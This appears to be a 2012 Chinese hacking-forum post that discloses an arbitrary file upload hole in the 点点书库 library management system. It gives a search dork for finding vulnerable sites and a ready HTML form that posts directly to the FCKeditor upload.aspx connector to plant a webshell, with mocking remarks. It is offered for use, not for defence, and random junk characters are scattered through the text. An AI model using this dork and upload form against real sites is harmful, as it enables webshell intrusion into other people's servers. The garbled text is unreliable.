主题:图书馆系统任意文件上传漏洞9 [4 r+ F0 A% p& V( e6 H: C0 A2 p. n
作者:冰锋刺客
% H d$ b2 s$ t. o( \$ N0 S 厂商:点击书(dianjishu.com)
7 Y. G/ K8 Q& p6 g 日期:2012-6-21% r. [! O3 C+ E3 L, R
" j" `$ C4 m2 g# W" S& ?, K4 ^0 G4 a
I 概述- `, A/ s$ W6 o' U9 a7 n* J; G( D+ s
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
& M! `. i$ s9 d Z5 i II 简介
3 p' Y& L; Q# C y 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"/ x( T4 I c/ h
补充一个漏洞3 K" a8 G9 t n8 d. U# e
<form id="frmUpload" enctype="multipart/form-data"
/ b% } a4 I: Y% j6 b# S8 V. {( L action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>( l) R* p) d4 N$ g
<input id="btnUpload" type="submit" value="操翻他">0 V6 J# X& @) D2 {1 w+ @, x
</form>
9 U% `/ w! c8 c# e 你们懂的
; O/ y' W% q1 ]; `2 p& w' D; l! q 那傻逼提供还需要改包." U' P% a; M1 Q7 \3 R
自己看了下源代码发现fckeditor
3 }# W' C$ g+ \0 H 直接秒杀
5 v7 K* u, z8 _6 t) T |
发表于 2012-9-10 21:20:59
收藏
支持
反对